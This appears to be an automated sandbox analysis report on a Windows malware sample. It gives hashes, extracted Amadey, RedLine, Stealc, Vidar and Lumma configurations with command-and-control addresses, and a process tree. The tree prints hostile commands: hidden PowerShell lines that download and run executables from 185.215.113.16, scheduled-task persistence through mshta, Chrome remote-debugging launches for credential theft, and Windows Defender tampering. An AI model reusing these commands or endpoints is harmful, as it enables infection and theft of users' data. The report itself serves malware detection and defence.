Resubmissions

21-02-2025 13:19

250221-qkqm1sskh1 10

21-02-2025 12:51

250221-p3vt1ssmek 10

20-02-2025 14:07

250220-rey8mswqdj 10

Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    20-02-2025 14:07

General

  • Target

    0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483.exe

  • Size

    2.1MB

  • MD5

    f22b0344fefdf201d07314323a83b022

  • SHA1

    6dde721e943cb298e50446083c1d7260071aaaae

  • SHA256

    0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483

  • SHA512

    61f92704af7395159edb879fe394a64e30b0b0818d642be1eeecafeee54e22570add0e4eac88c83e00cd9a4642e09a8529c77a69b4b7613bc3bcb9f78f50feac

  • SSDEEP

    49152:vDB/YpemdpJhhEwrtke2DSl/YKH7vOITWMPnzZPoc9j:9/kXhEikRDS/bvOIbPnzZxj

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/defend/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

redline

Botnet

cheat

C2

103.84.89.222:33791

Extracted

Family

stealc

Botnet

default

C2

http://ecozessentials.com

Attributes
  • url_path

    /e6cb1c8fc7cd1659.php

Extracted

Family

vidar

C2

https://t.me/g02f04

https://steamcommunity.com/profiles/76561199828130190

Attributes
  • user_agent

    Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0

Extracted

Family

lumma

C2

https://penetratebatt.pw/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detect Vidar Stealer 5 IoCs
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • Redline family
  • SectopRAT

    SectopRAT is a remote access trojan first seen in November 2019.

  • SectopRAT payload 2 IoCs
  • Sectoprat family
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Vidar family
  • Enumerates VirtualBox registry keys 2 TTPs 1 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 19 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Using powershell.exe command.

  • Downloads MZ/PE file 27 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Uses browser remote debugging 2 TTPs 7 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks BIOS information in registry 2 TTPs 38 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Event Triggered Execution: Component Object Model Hijacking 1 TTPs

    Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.

  • Executes dropped EXE 49 IoCs
  • Identifies Wine through registry keys 2 TTPs 19 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 8 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • AutoIT Executable 3 IoCs

    AutoIT scripts compiled to PE executables.

  • Boot or Logon Autostart Execution: Authentication Package 1 TTPs 1 IoCs

    Suspicious Windows Authentication Registry Modification.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 19 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 17 IoCs
  • Drops file in Windows directory 17 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 7 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 14 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 8 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 52 IoCs
  • Modifies registry class 38 IoCs
  • Modifies system certificate store 2 TTPs 10 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 19 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483.exe
    "C:\Users\Admin\AppData\Local\Temp\0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Identifies Wine through registry keys
    • Loads dropped DLL
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:2108
    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Downloads MZ/PE file
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Loads dropped DLL
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2808
      • C:\Users\Admin\AppData\Local\Temp\1088752001\sQ3DZPU.exe
        "C:\Users\Admin\AppData\Local\Temp\1088752001\sQ3DZPU.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:680
        • C:\ProgramData\apisysDirectx_11\apisysDirectx.exe
          "C:\ProgramData\apisysDirectx_11\apisysDirectx.exe"
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: AddClipboardFormatListener
          PID:2392
          • C:\Windows\SysWOW64\schtasks.exe
            "schtasks.exe" /create /tn apisysDirectx_11 /tr "C:\ProgramData\apisysDirectx_11\apisysDirectx.exe" /st 14:08 /du 23:59 /sc daily /ri 1 /f
            5⤵
            • Scheduled Task/Job: Scheduled Task
            PID:2284
      • C:\Users\Admin\AppData\Local\Temp\1088919001\a1EoH8b.exe
        "C:\Users\Admin\AppData\Local\Temp\1088919001\a1EoH8b.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1032
        • C:\Windows\SysWOW64\msiexec.exe
          "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\91b7d375130f294a\ScreenConnect.ClientSetup.msi"
          4⤵
          • Enumerates connected drives
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of FindShellTrayWindow
          PID:1732
      • C:\Users\Admin\AppData\Local\Temp\1089114001\MAl7pjE.exe
        "C:\Users\Admin\AppData\Local\Temp\1089114001\MAl7pjE.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:2280
      • C:\Users\Admin\AppData\Local\Temp\1089179101\7be12f2342.exe
        "C:\Users\Admin\AppData\Local\Temp\1089179101\7be12f2342.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:1796
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c schtasks /create /tn Gm2XTmagzMd /tr "mshta C:\Users\Admin\AppData\Local\Temp\hkn4fWTqr.hta" /sc minute /mo 25 /ru "Admin" /f
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2740
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /create /tn Gm2XTmagzMd /tr "mshta C:\Users\Admin\AppData\Local\Temp\hkn4fWTqr.hta" /sc minute /mo 25 /ru "Admin" /f
            5⤵
            • Scheduled Task/Job: Scheduled Task
            PID:2672
        • C:\Windows\SysWOW64\mshta.exe
          mshta C:\Users\Admin\AppData\Local\Temp\hkn4fWTqr.hta
          4⤵
          • System Location Discovery: System Language Discovery
          • Modifies Internet Explorer settings
          • Suspicious use of WriteProcessMemory
          PID:2724
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'2B1J70DQKY4P1C40OFHU9DSN9LFXU24H.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Downloads MZ/PE file
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:2492
            • C:\Users\Admin\AppData\Local\Temp2B1J70DQKY4P1C40OFHU9DSN9LFXU24H.EXE
              "C:\Users\Admin\AppData\Local\Temp2B1J70DQKY4P1C40OFHU9DSN9LFXU24H.EXE"
              6⤵
              • Modifies Windows Defender DisableAntiSpyware settings
              • Modifies Windows Defender Real-time Protection settings
              • Modifies Windows Defender TamperProtection settings
              • Modifies Windows Defender notification settings
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Windows security modification
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:1620
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\1089180021\am_no.cmd" "
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2032
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1089180021\am_no.cmd" any_word
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1032
          • C:\Windows\SysWOW64\timeout.exe
            timeout /t 2
            5⤵
            • System Location Discovery: System Language Discovery
            • Delays execution with timeout.exe
            PID:600
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:728
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:2044
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:892
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:2484
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2088
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:2912
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /create /tn "XNuwGmakeSC" /tr "mshta \"C:\Temp\oIlpHh5KE.hta\"" /sc minute /mo 25 /ru "Admin" /f
            5⤵
            • System Location Discovery: System Language Discovery
            • Scheduled Task/Job: Scheduled Task
            PID:2856
          • C:\Windows\SysWOW64\mshta.exe
            mshta "C:\Temp\oIlpHh5KE.hta"
            5⤵
            • System Location Discovery: System Language Discovery
            • Modifies Internet Explorer settings
            PID:1820
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
              6⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • Downloads MZ/PE file
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:2376
              • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                7⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Suspicious behavior: EnumeratesProcesses
                PID:1744
      • C:\Users\Admin\AppData\Local\Temp\1089273001\52206648a6.exe
        "C:\Users\Admin\AppData\Local\Temp\1089273001\52206648a6.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:2504
      • C:\Users\Admin\AppData\Local\Temp\1089274001\f29907a492.exe
        "C:\Users\Admin\AppData\Local\Temp\1089274001\f29907a492.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Checks processor information in registry
        • Suspicious behavior: EnumeratesProcesses
        PID:272
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 272 -s 800
          4⤵
          • Loads dropped DLL
          • Program crash
          PID:1488
      • C:\Users\Admin\AppData\Local\Temp\1089275001\amnew.exe
        "C:\Users\Admin\AppData\Local\Temp\1089275001\amnew.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious use of FindShellTrayWindow
        PID:2492
        • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
          "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
          4⤵
          • Downloads MZ/PE file
          • Executes dropped EXE
          • Loads dropped DLL
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          • Modifies system certificate store
          PID:876
          • C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe
            "C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            PID:2176
            • C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe
              "C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"
              6⤵
              • Executes dropped EXE
              PID:2468
            • C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe
              "C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"
              6⤵
              • Executes dropped EXE
              PID:2312
            • C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe
              "C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:988
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2176 -s 572
              6⤵
              • Loads dropped DLL
              • Program crash
              PID:272
          • C:\Users\Admin\AppData\Local\Temp\10009640101\372485f12e.exe
            "C:\Users\Admin\AppData\Local\Temp\10009640101\372485f12e.exe"
            5⤵
            • Enumerates VirtualBox registry keys
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Checks processor information in registry
            PID:2604
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
              6⤵
              • Uses browser remote debugging
              • Enumerates system info in registry
              • Suspicious use of FindShellTrayWindow
              PID:1740
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6449758,0x7fef6449768,0x7fef6449778
                7⤵
                  PID:932
                • C:\Windows\system32\ctfmon.exe
                  ctfmon.exe
                  7⤵
                    PID:852
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1148 --field-trial-handle=1336,i,333184034456571992,12190282700624038873,131072 /prefetch:2
                    7⤵
                      PID:1620
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1036 --field-trial-handle=1336,i,333184034456571992,12190282700624038873,131072 /prefetch:8
                      7⤵
                        PID:1708
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1640 --field-trial-handle=1336,i,333184034456571992,12190282700624038873,131072 /prefetch:8
                        7⤵
                          PID:2536
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2236 --field-trial-handle=1336,i,333184034456571992,12190282700624038873,131072 /prefetch:1
                          7⤵
                          • Uses browser remote debugging
                          PID:3144
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2320 --field-trial-handle=1336,i,333184034456571992,12190282700624038873,131072 /prefetch:1
                          7⤵
                          • Uses browser remote debugging
                          PID:3152
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1512 --field-trial-handle=1336,i,333184034456571992,12190282700624038873,131072 /prefetch:2
                          7⤵
                            PID:3580
                        • C:\Users\Admin\AppData\Local\Temp\service123.exe
                          "C:\Users\Admin\AppData\Local\Temp\service123.exe"
                          6⤵
                          • Executes dropped EXE
                          PID:3400
                        • C:\Windows\SysWOW64\schtasks.exe
                          "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\Admin\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
                          6⤵
                          • Scheduled Task/Job: Scheduled Task
                          PID:3424
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 2604 -s 972
                          6⤵
                          • Program crash
                          PID:3776
                      • C:\Users\Admin\AppData\Local\Temp\10009650101\3d2e5da9a6.exe
                        "C:\Users\Admin\AppData\Local\Temp\10009650101\3d2e5da9a6.exe"
                        5⤵
                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                        • Checks BIOS information in registry
                        • Executes dropped EXE
                        • Identifies Wine through registry keys
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        • Suspicious use of SetThreadContext
                        • System Location Discovery: System Language Discovery
                        PID:2032
                        • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                          "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                          6⤵
                          • Downloads MZ/PE file
                          PID:556
                  • C:\Users\Admin\AppData\Local\Temp\1089276001\db484a9c5c.exe
                    "C:\Users\Admin\AppData\Local\Temp\1089276001\db484a9c5c.exe"
                    3⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • System Location Discovery: System Language Discovery
                    • Modifies system certificate store
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2292
                  • C:\Users\Admin\AppData\Local\Temp\1089278001\DTQCxXZ.exe
                    "C:\Users\Admin\AppData\Local\Temp\1089278001\DTQCxXZ.exe"
                    3⤵
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2984
                  • C:\Users\Admin\AppData\Local\Temp\1089279001\7aencsM.exe
                    "C:\Users\Admin\AppData\Local\Temp\1089279001\7aencsM.exe"
                    3⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of SetThreadContext
                    PID:1776
                    • C:\Users\Admin\AppData\Local\Temp\1089279001\7aencsM.exe
                      "C:\Users\Admin\AppData\Local\Temp\1089279001\7aencsM.exe"
                      4⤵
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      • Checks processor information in registry
                      • Modifies system certificate store
                      PID:3004
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                        5⤵
                        • Uses browser remote debugging
                        • Enumerates system info in registry
                        • Suspicious use of FindShellTrayWindow
                        PID:3756
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef62f9758,0x7fef62f9768,0x7fef62f9778
                          6⤵
                            PID:3768
                          • C:\Windows\system32\ctfmon.exe
                            ctfmon.exe
                            6⤵
                              PID:3884
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1184 --field-trial-handle=1272,i,13616517698127073310,1899270643773375759,131072 /prefetch:2
                              6⤵
                                PID:3940
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1584 --field-trial-handle=1272,i,13616517698127073310,1899270643773375759,131072 /prefetch:8
                                6⤵
                                  PID:3960
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1640 --field-trial-handle=1272,i,13616517698127073310,1899270643773375759,131072 /prefetch:8
                                  6⤵
                                    PID:4032
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2224 --field-trial-handle=1272,i,13616517698127073310,1899270643773375759,131072 /prefetch:1
                                    6⤵
                                    • Uses browser remote debugging
                                    PID:3272
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2240 --field-trial-handle=1272,i,13616517698127073310,1899270643773375759,131072 /prefetch:1
                                    6⤵
                                    • Uses browser remote debugging
                                    PID:3292
